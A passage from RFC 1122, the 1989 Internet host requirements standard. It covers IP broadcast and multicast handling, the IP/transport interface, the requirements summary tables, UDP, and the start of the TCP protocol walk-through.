address forms, substituting 0 for -1. All hosts SHOULD
_________________________
*4.2BSD Unix and its derivatives, but not 4.3BSD.

RFC1122 INTERNET LAYER October 1989

recognize and accept any of these non-standard broadcast
addresses as the destination address of an incoming datagram.
A host MAY optionally have a configuration option to choose the
0 or the -1 form of broadcast address, for each physical
interface, but this option SHOULD default to the standard (-1)
form.

When a host sends a datagram to a link-layer broadcast address,
the IP destination address MUST be a legal IP broadcast or IP
multicast address.

A host SHOULD silently discard a datagram that is received via
a link-layer broadcast (see Section 2.4) but does not specify
an IP multicast or broadcast destination address.

Hosts SHOULD use the Limited Broadcast address to broadcast to
a connected network.

DISCUSSION:
Using the Limited Broadcast address instead of a Directed
Broadcast address may improve system robustness. Problems
are often caused by machines that do not understand the
plethora of broadcast addresses (see Section 3.2.1.3), or
that may have different ideas about which broadcast
addresses are in use. The prime example of the latter is
machines that do not understand subnetting but are
attached to a subnetted net. Sending a Subnet Broadcast
for the connected network will confuse those machines,
which will see it as a message to some other host.

There has been discussion on whether a datagram addressed
to the Limited Broadcast address ought to be sent from all
the interfaces of a multihomed host. This specification
takes no stand on the issue.

3.3.7 IP Multicasting

A host SHOULD support local IP multicasting on all connected
networks for which a mapping from Class D IP addresses to
link-layer addresses has been specified (see below). Support
for local IP multicasting includes sending multicast datagrams,
joining multicast groups and receiving multicast datagrams, and
leaving multicast groups. This implies support for all of
[IP:4] except the IGMP protocol itself, which is OPTIONAL.

RFC1122 INTERNET LAYER October 1989

DISCUSSION:
IGMP provides gateways that are capable of multicast
routing with the information required to support IP
multicasting across multiple networks. At this time,
multicast-routing gateways are in the experimental stage
and are not widely available. For hosts that are not
connected to networks with multicast-routing gateways or
that do not need to receive multicast datagrams
originating on other networks, IGMP serves no purpose and
is therefore optional for now. However, the rest of
[IP:4] is currently recommended for the purpose of
providing IP-layer access to local network multicast
addressing, as a preferable alternative to local broadcast
addressing. It is expected that IGMP will become
recommended at some future date, when multicast-routing
gateways have become more widely available.

If IGMP is not implemented, a host SHOULD still join the "all-
hosts" group (224.0.0.1) when the IP layer is initialized and
remain a member for as long as the IP layer is active.

DISCUSSION:
Joining the "all-hosts" group will support strictly local
uses of multicasting, e.g., a gateway discovery protocol,
even if IGMP is not implemented.

The mapping of IP Class D addresses to local addresses is
currently specified for the following types of networks:

o Ethernet/IEEE 802.3, as defined in [IP:4].

o Any network that supports broadcast but not multicast,
addressing: all IP Class D addresses map to the local
broadcast address.

o Any type of point-to-point link (e.g., SLIP or HDLC
links): no mapping required. All IP multicast datagrams
are sent as-is, inside the local framing.

Mappings for other types of networks will be specified in the
future.

A host SHOULD provide a way for higher-layer protocols or
applications to determine which of the host's connected
network(s) support IP multicast addressing.

RFC1122 INTERNET LAYER October 1989

3.3.8 Error Reporting

Wherever practical, hosts MUST return ICMP error datagrams on
detection of an error, except in those cases where returning an
ICMP error message is specifically prohibited.

DISCUSSION:
A common phenomenon in datagram networks is the "black
hole disease": datagrams are sent out, but nothing comes
back. Without any error datagrams, it is difficult for
the user to figure out what the problem is.

3.4 INTERNET/TRANSPORT LAYER INTERFACE

The interface between the IP layer and the transport layer MUST
provide full access to all the mechanisms of the IP layer,
including options, Type-of-Service, and Time-to-Live. The
transport layer MUST either have mechanisms to set these interface
parameters, or provide a path to pass them through from an
application, or both.

DISCUSSION:
Applications are urged to make use of these mechanisms where
applicable, even when the mechanisms are not currently
effective in the Internet (e.g., TOS). This will allow these
mechanisms to be immediately useful when they do become
effective, without a large amount of retrofitting of host
software.

We now describe a conceptual interface between the transport layer
and the IP layer, as a set of procedure calls. This is an
extension of the information in Section 3.3 of RFC-791 [IP:1].

* Send Datagram

SEND(src, dst, prot, TOS, TTL, BufPTR, len, Id, DF, opt
=> result )

where the parameters are defined in RFC-791. Passing an Id
parameter is optional; see Section 3.2.1.5.

* Receive Datagram

RECV(BufPTR, prot
=> result, src, dst, SpecDest, TOS, len, opt)

RFC1122 INTERNET LAYER October 1989

All the parameters are defined in RFC-791, except for:

SpecDest = specific-destination address of datagram
(defined in Section 3.2.1.3)

The result parameter dst contains the datagram's destination
address. Since this may be a broadcast or multicast address,
the SpecDest parameter (not shown in RFC-791) MUST be passed.
The parameter opt contains all the IP options received in the
datagram; these MUST also be passed to the transport layer.

* Select Source Address

GET_SRCADDR(remote, TOS) -> local

remote = remote IP address
TOS = Type-of-Service
local = local IP address

See Section 3.3.4.3.

* Find Maximum Datagram Sizes

GET_MAXSIZES(local, remote, TOS) -> MMS_R, MMS_S

MMS_R = maximum receive transport-message size.
MMS_S = maximum send transport-message size.
(local, remote, TOS defined above)

See Sections 3.3.2 and 3.3.3.

* Advice on Delivery Success

ADVISE_DELIVPROB(sense, local, remote, TOS)

Here the parameter sense is a 1-bit flag indicating whether
positive or negative advice is being given; see the
discussion in Section 3.3.1.4. The other parameters were
defined earlier.

* Send ICMP Message

SEND_ICMP(src, dst, TOS, TTL, BufPTR, len, Id, DF, opt)
-> result

RFC1122 INTERNET LAYER October 1989

(Parameters defined in RFC-791).

Passing an Id parameter is optional; see Section 3.2.1.5.
The transport layer MUST be able to send certain ICMP
messages: Port Unreachable or any of the query-type
messages. This function could be considered to be a special
case of the SEND() call, of course; we describe it separately
for clarity.

* Receive ICMP Message

RECV_ICMP(BufPTR ) -> result, src, dst, len, opt

(Parameters defined in RFC-791).

The IP layer MUST pass certain ICMP messages up to the
appropriate transport-layer routine. This function could be
considered to be a special case of the RECV() call, of
course; we describe it separately for clarity.

For an ICMP error message, the data that is passed up MUST
include the original Internet header plus all the octets of
the original message that are included in the ICMP message.
This data will be used by the transport layer to locate the
connection state information, if any.

In particular, the following ICMP messages are to be passed
up:

o Destination Unreachable

o Source Quench

o Echo Reply (to ICMP user interface, unless the Echo
Request originated in the IP layer)

o Timestamp Reply (to ICMP user interface)

o Time Exceeded

DISCUSSION:
In the future, there may be additions to this interface to
pass path data (see Section 3.3.1.3) between the IP and
transport layers.

RFC1122 INTERNET LAYER October 1989

3.5 INTERNET LAYER REQUIREMENTS SUMMARY

| | | | |S| |
| | | | |H| |F
| | | | |O|M|o
| | |S| |U|U|o
| | |H| |L|S|t
| |M|O| |D|T|n
| |U|U|M| | |o
| |S|L|A|N|N|t
| |T|D|Y|O|O|t
FEATURE |SECTION | | | |T|T|e
-------------------------------------------------|--------|-|-|-|-|-|--
| | | | | | |
Implement IP and ICMP |3.1 |x| | | | |
Handle remote multihoming in application layer |3.1 |x| | | | |
Support local multihoming |3.1 | | |x| | |
Meet gateway specs if forward datagrams |3.1 |x| | | | |
Configuration switch for embedded gateway |3.1 |x| | | | |1
Config switch default to non-gateway |3.1 |x| | | | |1
Auto-config based on number of interfaces |3.1 | | | | |x|1
Able to log discarded datagrams |3.1 | |x| | | |
Record in counter |3.1 | |x| | | |
| | | | | | |
Silently discard Version != 4 |3.2.1.1 |x| | | | |
Verify IP checksum, silently discard bad dgram |3.2.1.2 |x| | | | |
Addressing: | | | | | | |
Subnet addressing (RFC-950) |3.2.1.3 |x| | | | |
Src address must be host's own IP address |3.2.1.3 |x| | | | |
Silently discard datagram with bad dest addr |3.2.1.3 |x| | | | |
Silently discard datagram with bad src addr |3.2.1.3 |x| | | | |
Support reassembly |3.2.1.4 |x| | | | |
Retain same Id field in identical datagram |3.2.1.5 | | |x| | |
| | | | | | |
TOS: | | | | | | |
Allow transport layer to set TOS |3.2.1.6 |x| | | | |
Pass received TOS up to transport layer |3.2.1.6 | |x| | | |
Use RFC-795 link-layer mappings for TOS |3.2.1.6 | | | |x| |
TTL: | | | | | | |
Send packet with TTL of 0 |3.2.1.7 | | | | |x|
Discard received packets with TTL < 2 |3.2.1.7 | | | | |x|
Allow transport layer to set TTL |3.2.1.7 |x| | | | |
Fixed TTL is configurable |3.2.1.7 |x| | | | |
| | | | | | |
IP Options: | | | | | | |
Allow transport layer to send IP options |3.2.1.8 |x| | | | |
Pass all IP options rcvd to higher layer |3.2.1.8 |x| | | | |

RFC1122 INTERNET LAYER October 1989

IP layer silently ignore unknown options |3.2.1.8 |x| | | | |
Security option |3.2.1.8a| | |x| | |
Send Stream Identifier option |3.2.1.8b| | | |x| |
Silently ignore Stream Identifer option |3.2.1.8b|x| | | | |
Record Route option |3.2.1.8d| | |x| | |
Timestamp option |3.2.1.8e| | |x| | |
Source Route Option: | | | | | | |
Originate & terminate Source Route options |3.2.1.8c|x| | | | |
Datagram with completed SR passed up to TL |3.2.1.8c|x| | | | |
Build correct (non-redundant) return route |3.2.1.8c|x| | | | |
Send multiple SR options in one header |3.2.1.8c| | | | |x|
| | | | | | |
ICMP: | | | | | | |
Silently discard ICMP msg with unknown type |3.2.2 |x| | | | |
Include more than 8 octets of orig datagram |3.2.2 | | |x| | |
Included octets same as received |3.2.2 |x| | | | |
Demux ICMP Error to transport protocol |3.2.2 |x| | | | |
Send ICMP error message with TOS=0 |3.2.2 | |x| | | |
Send ICMP error message for: | | | | | | |
- ICMP error msg |3.2.2 | | | | |x|
- IP b'cast or IP m'cast |3.2.2 | | | | |x|
- Link-layer b'cast |3.2.2 | | | | |x|
- Non-initial fragment |3.2.2 | | | | |x|
- Datagram with non-unique src address |3.2.2 | | | | |x|
Return ICMP error msgs (when not prohibited) |3.3.8 |x| | | | |
| | | | | | |
Dest Unreachable: | | | | | | |
Generate Dest Unreachable (code 2/3) |3.2.2.1 | |x| | | |
Pass ICMP Dest Unreachable to higher layer |3.2.2.1 |x| | | | |
Higher layer act on Dest Unreach |3.2.2.1 | |x| | | |
Interpret Dest Unreach as only hint |3.2.2.1 |x| | | | |
Redirect: | | | | | | |
Host send Redirect |3.2.2.2 | | | |x| |
Update route cache when recv Redirect |3.2.2.2 |x| | | | |
Handle both Host and Net Redirects |3.2.2.2 |x| | | | |
Discard illegal Redirect |3.2.2.2 | |x| | | |
Source Quench: | | | | | | |
Send Source Quench if buffering exceeded |3.2.2.3 | | |x| | |
Pass Source Quench to higher layer |3.2.2.3 |x| | | | |
Higher layer act on Source Quench |3.2.2.3 | |x| | | |
Time Exceeded: pass to higher layer |3.2.2.4 |x| | | | |
Parameter Problem: | | | | | | |
Send Parameter Problem messages |3.2.2.5 | |x| | | |
Pass Parameter Problem to higher layer |3.2.2.5 |x| | | | |
Report Parameter Problem to user |3.2.2.5 | | |x| | |
| | | | | | |
ICMP Echo Request or Reply: | | | | | | |
Echo server and Echo client |3.2.2.6 |x| | | | |

RFC1122 INTERNET LAYER October 1989

Echo client |3.2.2.6 | |x| | | |
Discard Echo Request to broadcast address |3.2.2.6 | | |x| | |
Discard Echo Request to multicast address |3.2.2.6 | | |x| | |
Use specific-dest addr as Echo Reply src |3.2.2.6 |x| | | | |
Send same data in Echo Reply |3.2.2.6 |x| | | | |
Pass Echo Reply to higher layer |3.2.2.6 |x| | | | |
Reflect Record Route, Time Stamp options |3.2.2.6 | |x| | | |
Reverse and reflect Source Route option |3.2.2.6 |x| | | | |
| | | | | | |
ICMP Information Request or Reply: |3.2.2.7 | | | |x| |
ICMP Timestamp and Timestamp Reply: |3.2.2.8 | | |x| | |
Minimize delay variability |3.2.2.8 | |x| | | |1
Silently discard b'cast Timestamp |3.2.2.8 | | |x| | |1
Silently discard m'cast Timestamp |3.2.2.8 | | |x| | |1
Use specific-dest addr as TS Reply src |3.2.2.8 |x| | | | |1
Reflect Record Route, Time Stamp options |3.2.2.6 | |x| | | |1
Reverse and reflect Source Route option |3.2.2.8 |x| | | | |1
Pass Timestamp Reply to higher layer |3.2.2.8 |x| | | | |1
Obey rules for "standard value" |3.2.2.8 |x| | | | |1
| | | | | | |
ICMP Address Mask Request and Reply: | | | | | | |
Addr Mask source configurable |3.2.2.9 |x| | | | |
Support static configuration of addr mask |3.2.2.9 |x| | | | |
Get addr mask dynamically during booting |3.2.2.9 | | |x| | |
Get addr via ICMP Addr Mask Request/Reply |3.2.2.9 | | |x| | |
Retransmit Addr Mask Req if no Reply |3.2.2.9 |x| | | | |3
Assume default mask if no Reply |3.2.2.9 | |x| | | |3
Update address mask from first Reply only |3.2.2.9 |x| | | | |3
Reasonableness check on Addr Mask |3.2.2.9 | |x| | | |
Send unauthorized Addr Mask Reply msgs |3.2.2.9 | | | | |x|
Explicitly configured to be agent |3.2.2.9 |x| | | | |
Static config=> Addr-Mask-Authoritative flag |3.2.2.9 | |x| | | |
Broadcast Addr Mask Reply when init. |3.2.2.9 |x| | | | |3
| | | | | | |
ROUTING OUTBOUND DATAGRAMS: | | | | | | |
Use address mask in local/remote decision |3.3.1.1 |x| | | | |
Operate with no gateways on conn network |3.3.1.1 |x| | | | |
Maintain "route cache" of next-hop gateways |3.3.1.2 |x| | | | |
Treat Host and Net Redirect the same |3.3.1.2 | |x| | | |
If no cache entry, use default gateway |3.3.1.2 |x| | | | |
Support multiple default gateways |3.3.1.2 |x| | | | |
Provide table of static routes |3.3.1.2 | | |x| | |
Flag: route overridable by Redirects |3.3.1.2 | | |x| | |
Key route cache on host, not net address |3.3.1.3 | | |x| | |
Include TOS in route cache |3.3.1.3 | |x| | | |
| | | | | | |
Able to detect failure of next-hop gateway |3.3.1.4 |x| | | | |
Assume route is good forever |3.3.1.4 | | | |x| |

RFC1122 INTERNET LAYER October 1989

Ping gateways continuously |3.3.1.4 | | | | |x|
Ping only when traffic being sent |3.3.1.4 |x| | | | |
Ping only when no positive indication |3.3.1.4 |x| | | | |
Higher and lower layers give advice |3.3.1.4 | |x| | | |
Switch from failed default g'way to another |3.3.1.5 |x| | | | |
Manual method of entering config info |3.3.1.6 |x| | | | |
| | | | | | |
REASSEMBLY and FRAGMENTATION: | | | | | | |
Able to reassemble incoming datagrams |3.3.2 |x| | | | |
At least 576 byte datagrams |3.3.2 |x| | | | |
EMTU_R configurable or indefinite |3.3.2 | |x| | | |
Transport layer able to learn MMS_R |3.3.2 |x| | | | |
Send ICMP Time Exceeded on reassembly timeout |3.3.2 |x| | | | |
Fixed reassembly timeout value |3.3.2 | |x| | | |
| | | | | | |
Pass MMS_S to higher layers |3.3.3 |x| | | | |
Local fragmentation of outgoing packets |3.3.3 | | |x| | |
Else don't send bigger than MMS_S |3.3.3 |x| | | | |
Send max 576 to off-net destination |3.3.3 | |x| | | |
All-Subnets-MTU configuration flag |3.3.3 | | |x| | |
| | | | | | |
MULTIHOMING: | | | | | | |
Reply with same addr as spec-dest addr |3.3.4.2 | |x| | | |
Allow application to choose local IP addr |3.3.4.2 |x| | | | |
Silently discard d'gram in "wrong" interface |3.3.4.2 | | |x| | |
Only send d'gram through "right" interface |3.3.4.2 | | |x| | |4
| | | | | | |
SOURCE-ROUTE FORWARDING: | | | | | | |
Forward datagram with Source Route option |3.3.5 | | |x| | |1
Obey corresponding gateway rules |3.3.5 |x| | | | |1
Update TTL by gateway rules |3.3.5 |x| | | | |1
Able to generate ICMP err code 4, 5 |3.3.5 |x| | | | |1
IP src addr not local host |3.3.5 | | |x| | |1
Update Timestamp, Record Route options |3.3.5 |x| | | | |1
Configurable switch for non-local SRing |3.3.5 |x| | | | |1
Defaults to OFF |3.3.5 |x| | | | |1
Satisfy gwy access rules for non-local SRing |3.3.5 |x| | | | |1
If not forward, send Dest Unreach (cd 5) |3.3.5 | |x| | | |2
| | | | | | |
BROADCAST: | | | | | | |
Broadcast addr as IP source addr |3.2.1.3 | | | | |x|
Receive 0 or -1 broadcast formats OK |3.3.6 | |x| | | |
Config'ble option to send 0 or -1 b'cast |3.3.6 | | |x| | |
Default to -1 broadcast |3.3.6 | |x| | | |
Recognize all broadcast address formats |3.3.6 |x| | | | |
Use IP b'cast/m'cast addr in link-layer b'cast |3.3.6 |x| | | | |
Silently discard link-layer-only b'cast dg's |3.3.6 | |x| | | |
Use Limited Broadcast addr for connected net |3.3.6 | |x| | | |

RFC1122 INTERNET LAYER October 1989

| | | | | | |
MULTICAST: | | | | | | |
Support local IP multicasting (RFC-1112) |3.3.7 | |x| | | |
Support IGMP (RFC-1112) |3.3.7 | | |x| | |
Join all-hosts group at startup |3.3.7 | |x| | | |
Higher layers learn i'face m'cast capability |3.3.7 | |x| | | |
| | | | | | |
INTERFACE: | | | | | | |
Allow transport layer to use all IP mechanisms |3.4 |x| | | | |
Pass interface ident up to transport layer |3.4 |x| | | | |
Pass all IP options up to transport layer |3.4 |x| | | | |
Transport layer can send certain ICMP messages |3.4 |x| | | | |
Pass spec'd ICMP messages up to transp. layer |3.4 |x| | | | |
Include IP hdr+8 octets or more from orig. |3.4 |x| | | | |
Able to leap tall buildings at a single bound |3.5 | |x| | | |

Footnotes:

(1) Only if feature is implemented.

(2) This requirement is overruled if datagram is an ICMP error message.

(3) Only if feature is implemented and is configured "on".

(4) Unless has embedded gateway functionality or is source routed.

RFC1122 TRANSPORT LAYER -- UDP October 1989

4. TRANSPORT PROTOCOLS

4.1 USER DATAGRAM PROTOCOL -- UDP

4.1.1 INTRODUCTION

The User Datagram Protocol UDP [UDP:1] offers only a minimal
transport service -- non-guaranteed datagram delivery -- and
gives applications direct access to the datagram service of the
IP layer. UDP is used by applications that do not require the
level of service of TCP or that wish to use communications
services (e.g., multicast or broadcast delivery) not available
from TCP.

UDP is almost a null protocol; the only services it provides
over IP are checksumming of data and multiplexing by port
number. Therefore, an application program running over UDP
must deal directly with end-to-end communication problems that
a connection-oriented protocol would have handled -- e.g.,
retransmission for reliable delivery, packetization and
reassembly, flow control, congestion avoidance, etc., when
these are required. The fairly complex coupling between IP and
TCP will be mirrored in the coupling between UDP and many
applications using UDP.

4.1.2 PROTOCOL WALK-THROUGH

There are no known errors in the specification of UDP.

4.1.3 SPECIFIC ISSUES

4.1.3.1 Ports

UDP well-known ports follow the same rules as TCP well-known
ports; see Section 4.2.2.1 below.

If a datagram arrives addressed to a UDP port for which
there is no pending LISTEN call, UDP SHOULD send an ICMP
Port Unreachable message.

4.1.3.2 IP Options

UDP MUST pass any IP option that it receives from the IP
layer transparently to the application layer.

An application MUST be able to specify IP options to be sent
in its UDP datagrams, and UDP MUST pass these options to the
IP layer.

RFC1122 TRANSPORT LAYER -- UDP October 1989

DISCUSSION:
At present, the only options that need be passed
through UDP are Source Route, Record Route, and Time
Stamp. However, new options may be defined in the
future, and UDP need not and should not make any
assumptions about the format or content of options it
passes to or from the application; an exception to this
might be an IP-layer security option.

An application based on UDP will need to obtain a
source route from a request datagram and supply a
reversed route for sending the corresponding reply.

4.1.3.3 ICMP Messages

UDP MUST pass to the application layer all ICMP error
messages that it receives from the IP layer. Conceptually
at least, this may be accomplished with an upcall to the
ERROR_REPORT routine (see Section 4.2.4.1).

DISCUSSION:
Note that ICMP error messages resulting from sending a
UDP datagram are received asynchronously. A UDP-based
application that wants to receive ICMP error messages
is responsible for maintaining the state necessary to
demultiplex these messages when they arrive; for
example, the application may keep a pending receive
operation for this purpose. The application is also
responsible to avoid confusion from a delayed ICMP
error message resulting from an earlier use of the same
port(s).

4.1.3.4 UDP Checksums

A host MUST implement the facility to generate and validate
UDP checksums. An application MAY optionally be able to
control whether a UDP checksum will be generated, but it
MUST default to checksumming on.

If a UDP datagram is received with a checksum that is non-
zero and invalid, UDP MUST silently discard the datagram.
An application MAY optionally be able to control whether UDP
datagrams without checksums should be discarded or passed to
the application.

DISCUSSION:
Some applications that normally run only across local
area networks have chosen to turn off UDP checksums for

RFC1122 TRANSPORT LAYER -- UDP October 1989

efficiency. As a result, numerous cases of undetected
errors have been reported. The advisability of ever
turning off UDP checksumming is very controversial.

IMPLEMENTATION:
There is a common implementation error in UDP
checksums. Unlike the TCP checksum, the UDP checksum
is optional; the value zero is transmitted in the
checksum field of a UDP header to indicate the absence
of a checksum. If the transmitter really calculates a
UDP checksum of zero, it must transmit the checksum as
all 1's (65535). No special action is required at the
receiver, since zero and 65535 are equivalent in 1's
complement arithmetic.

4.1.3.5 UDP Multihoming

When a UDP datagram is received, its specific-destination
address MUST be passed up to the application layer.

An application program MUST be able to specify the IP source
address to be used for sending a UDP datagram or to leave it
unspecified (in which case the networking software will
choose an appropriate source address). There SHOULD be a
way to communicate the chosen source address up to the
application layer (e.g, so that the application can later
receive a reply datagram only from the corresponding
interface).

DISCUSSION:
A request/response application that uses UDP should use
a source address for the response that is the same as
the specific destination address of the request. See
the "General Issues" section of [INTRO:1].

4.1.3.6 Invalid Addresses

A UDP datagram received with an invalid IP source address
(e.g., a broadcast or multicast address) must be discarded
by UDP or by the IP layer (see Section 3.2.1.3).

When a host sends a UDP datagram, the source address MUST be
(one of) the IP address(es) of the host.

4.1.4 UDP/APPLICATION LAYER INTERFACE

The application interface to UDP MUST provide the full services
of the IP/transport interface described in Section 3.4 of this

RFC1122 TRANSPORT LAYER -- UDP October 1989

document. Thus, an application using UDP needs the functions
of the GET_SRCADDR(), GET_MAXSIZES(), ADVISE_DELIVPROB(), and
RECV_ICMP() calls described in Section 3.4. For example,
GET_MAXSIZES() can be used to learn the effective maximum UDP
maximum datagram size for a particular {interface,remote
host,TOS} triplet.

An application-layer program MUST be able to set the TTL and
TOS values as well as IP options for sending a UDP datagram,
and these values must be passed transparently to the IP layer.
UDP MAY pass the received TOS up to the application layer.

4.1.5 UDP REQUIREMENTS SUMMARY

| | | | |S| |
| | | | |H| |F
| | | | |O|M|o
| | |S| |U|U|o
| | |H| |L|S|t
| |M|O| |D|T|n
| |U|U|M| | |o
| |S|L|A|N|N|t
| |T|D|Y|O|O|t
FEATURE |SECTION | | | |T|T|e
-------------------------------------------------|--------|-|-|-|-|-|--
| | | | | | |
UDP | | | | | | |
-------------------------------------------------|--------|-|-|-|-|-|--
| | | | | | |
UDP send Port Unreachable |4.1.3.1 | |x| | | |
| | | | | | |
IP Options in UDP | | | | | | |
- Pass rcv'd IP options to applic layer |4.1.3.2 |x| | | | |
- Applic layer can specify IP options in Send |4.1.3.2 |x| | | | |
- UDP passes IP options down to IP layer |4.1.3.2 |x| | | | |
| | | | | | |
Pass ICMP msgs up to applic layer |4.1.3.3 |x| | | | |
| | | | | | |
UDP checksums: | | | | | | |
- Able to generate/check checksum |4.1.3.4 |x| | | | |
- Silently discard bad checksum |4.1.3.4 |x| | | | |
- Sender Option to not generate checksum |4.1.3.4 | | |x| | |
- Default is to checksum |4.1.3.4 |x| | | | |
- Receiver Option to require checksum |4.1.3.4 | | |x| | |
| | | | | | |
UDP Multihoming | | | | | | |
- Pass spec-dest addr to application |4.1.3.5 |x| | | | |

RFC1122 TRANSPORT LAYER -- UDP October 1989

- Applic layer can specify Local IP addr |4.1.3.5 |x| | | | |
- Applic layer specify wild Local IP addr |4.1.3.5 |x| | | | |
- Applic layer notified of Local IP addr used |4.1.3.5 | |x| | | |
| | | | | | |
Bad IP src addr silently discarded by UDP/IP |4.1.3.6 |x| | | | |
Only send valid IP source address |4.1.3.6 |x| | | | |
UDP Application Interface Services | | | | | | |
Full IP interface of 3.4 for application |4.1.4 |x| | | | |
- Able to spec TTL, TOS, IP opts when send dg |4.1.4 |x| | | | |
- Pass received TOS up to applic layer |4.1.4 | | |x| | |

RFC1122 TRANSPORT LAYER -- TCP October 1989

4.2 TRANSMISSION CONTROL PROTOCOL -- TCP

4.2.1 INTRODUCTION

The Transmission Control Protocol TCP [TCP:1] is the primary
virtual-circuit transport protocol for the Internet suite. TCP
provides reliable, in-sequence delivery of a full-duplex stream
of octets (8-bit bytes). TCP is used by those applications
needing reliable, connection-oriented transport service, e.g.,
mail (SMTP), file transfer (FTP), and virtual terminal service
(Telnet); requirements for these application-layer protocols
are described in [INTRO:1].

4.2.2 PROTOCOL WALK-THROUGH

4.2.2.1 Well-Known Ports: RFC-793 Section 2.7

DISCUSSION:
TCP reserves port numbers in the range 0-255 for
"well-known" ports, used to access services that are
standardized across the Internet. The remainder of the
port space can be freely allocated to application
processes. Current well-known port definitions are
listed in the RFC entitled "Assigned Numbers"
[INTRO:6]. A prerequisite for defining a new well-
known port is an RFC documenting the proposed service
in enough detail to allow new implementations.

Some systems extend this notion by adding a third
subdivision of the TCP port space: reserved ports,
which are generally used for operating-system-specific
services. For example, reserved ports might fall
between 256 and some system-dependent upper limit.
Some systems further choose to protect well-known and
reserved ports by permitting only privileged users to
open TCP connections with those port values. This is
perfectly reasonable as long as the host does not
assume that all hosts protect their low-numbered ports
in this manner.

4.2.2.2 Use of Push: RFC-793 Section 2.8

When an application issues a series of SEND calls without
setting the PUSH flag, the TCP MAY aggregate the data
internally without sending it. Similarly, when a series of
segments is received without the PSH bit, a TCP MAY queue
the data internally without passing it to the receiving
application.

RFC1122 TRANSPORT LAYER -- TCP October 1989

The PSH bit is not a record marker and is independent of
segment boundaries. The transmitter SHOULD collapse
successive PSH bits when it packetizes data, to send the
largest possible segment.

A TCP MAY implement PUSH flags on SEND calls. If PUSH flags
are not implemented, then the sending TCP: (1) must not
buffer data indefinitely, and (2) MUST set the PSH bit in
the last buffered segment (i.e., when there is no more
queued data to be sent).

The discussion in RFC-793 on pages 48, 50, and 74
erroneously implies that a received PSH flag must be passed
to the application layer. Passing a received PSH flag to
the application layer is now OPTIONAL.

An application program is logically required to set the PUSH
flag in a SEND call whenever it needs to force delivery of
the data to avoid a communication deadlock. However, a TCP
SHOULD send a maximum-sized segment whenever possible, to
improve performance (see Section 4.2.3.4).

DISCUSSION:
When the PUSH flag is not implemented on SEND calls,
i.e., when the application/TCP interface uses a pure
streaming model, responsibility for aggregating any
tiny data fragments to form reasonable sized segments
is partially borne by the application layer.

Generally, an interactive application protocol must set
the PUSH flag at least in the last SEND call in each
command or response sequence. A bulk transfer protocol
like FTP should set the PUSH flag on the last segment
of a file or when necessary to prevent buffer deadlock.

At the receiver, the PSH bit forces buffered data to be
delivered to the application (even if less than a full
buffer has been received). Conversely, the lack of a
PSH bit can be used to avoid unnecessary wakeup calls
to the application process; this can be an important
performance optimization for large timesharing hosts.
Passing the PSH bit to the receiving application allows
an analogous optimization within the application.

4.2.2.3 Window Size: RFC-793 Section 3.1

The window size MUST be treated as an unsigned number, or
else large window sizes will appear like negative windows

RFC1122 TRANSPORT LAYER -- TCP October 1989

and TCP will not work. It is RECOMMENDED that
implementations reserve 32-bit fields for the send and
receive window sizes in the connection record and do all
window computations with 32 bits.

DISCUSSION:
It is known that the window field in the TCP header is
too small for high-speed, long-delay paths.
Experimental TCP options have been defined to extend
the window size; see for example [TCP:11]. In
anticipation of the adoption of such an extension, TCP
implementors should treat windows as 32 bits.

4.2.2.4 Urgent Pointer: RFC-793 Section 3.1

The second sentence is in error: the urgent pointer points
to the sequence number of the LAST octet (not LAST+1) in a
sequence of urgent data. The description on page 56 (last
sentence) is correct.

A TCP MUST support a sequence of urgent data of any length.

A TCP MUST inform the application layer asynchronously
whenever it receives an Urgent pointer and there was
previously no pending urgent data, or whenever the Urgent
pointer advances in the data stream. There MUST be a way
for the application to learn how much urgent data remains to
be read from the connection, or at least to determine
whether or not more urgent data remains to be read.

DISCUSSION:
Although the Urgent mechanism may be used for any
application, it is normally used to send "interrupt"-
type commands to a Telnet program (see "Using Telnet
Synch Sequence" section in [INTRO:1]).

The asynchronous or "out-of-band" notification will
allow the application to go into "urgent mode", reading
data from the TCP connection. This allows control
commands to be sent to an application whose normal
input buffers are full of unprocessed data.

IMPLEMENTATION:
The generic ERROR-REPORT() upcall described in Section
4.2.4.1 is a possible mechanism for informing the
application of the arrival of urgent data.

RFC1122 TRANSPORT LAYER -- TCP October 1989

4.2.2.5 TCP Options: RFC-793 Section 3.1

A TCP MUST be able to receive a TCP option in any segment.
A TCP MUST ignore without error any TCP option it does not
implement, assuming that the option has a length field (all
TCP options defined in the future will have length fields).
TCP MUST be prepared to handle an illegal option length
(e.g., zero) without crashing; a suggested procedure is to
reset the connection and log the reason.

4.2.2.6 Maximum Segment Size Option: RFC-793 Section 3.1

TCP MUST implement both sending and receiving the Maximum
Segment Size option [TCP:4].

TCP SHOULD send an MSS (Maximum Segment Size) option in
every SYN segment when its receive MSS differs from the
default 536, and MAY send it always.

If an MSS option is not received at connection setup, TCP
MUST assume a default send MSS of 536 (576-40) [TCP:4].

The maximum size of a segment that TCP really sends, the
"effective send MSS," MUST be the smaller of the send MSS
(which reflects the available reassembly buffer size at the
remote host) and the largest size permitted by the IP layer:

Eff.snd.MSS =

min(SendMSS+20, MMS_S) - TCPhdrsize - IPoptionsize

where:

* SendMSS is the MSS value received from the remote host,
or the default 536 if no MSS option is received.

* MMS_S is the maximum size for a transport-layer message
that TCP may send.

* TCPhdrsize is the size of the TCP header; this is
normally 20, but may be larger if TCP options are to be
sent.

* IPoptionsize is the size of any IP options that TCP
will pass to the IP layer with the current message.

The MSS value to be sent in an MSS option must be less than

RFC1122 TRANSPORT LAYER -- TCP October 1989

or equal to:

MMS_R - 20

where MMS_R is the maximum size for a transport-layer
message that can be received (and reassembled). TCP obtains
MMS_R and MMS_S from the IP layer; see the generic call
GET_MAXSIZES in Section 3.4.

DISCUSSION:
The choice of TCP segment size has a strong effect on
performance. Larger segments increase throughput by
amortizing header size and per-datagram processing
overhead over more data bytes; however, if the packet
is so large that it causes IP fragmentation, efficiency
drops sharply if any fragments are lost [IP:9].

Some TCP implementations send an MSS option only if the
destination host is on a non-connected network.
However, in general the TCP layer may not have the
appropriate information to make this decision, so it is
preferable to leave to the IP layer the task of
determining a suitable MTU for the Internet path. We
therefore recommend that TCP always send the option (if
not 536) and that the IP layer determine MMS_R as
specified in 3.3.3 and 3.4. A proposed IP-layer
mechanism to measure the MTU would then modify the IP
layer without changing TCP.

4.2.2.7 TCP Checksum: RFC-793 Section 3.1

Unlike the UDP checksum (see Section 4.1.3.4), the TCP
checksum is never optional. The sender MUST generate it and
the receiver MUST check it.

4.2.2.8 TCP Connection State Diagram: RFC-793 Section 3.2,
page 23

There are several problems with this diagram:

(a) The arrow from SYN-SENT to SYN-RCVD should be labeled
with "snd SYN,ACK", to agree with the text on page 68
and with Figure 8.

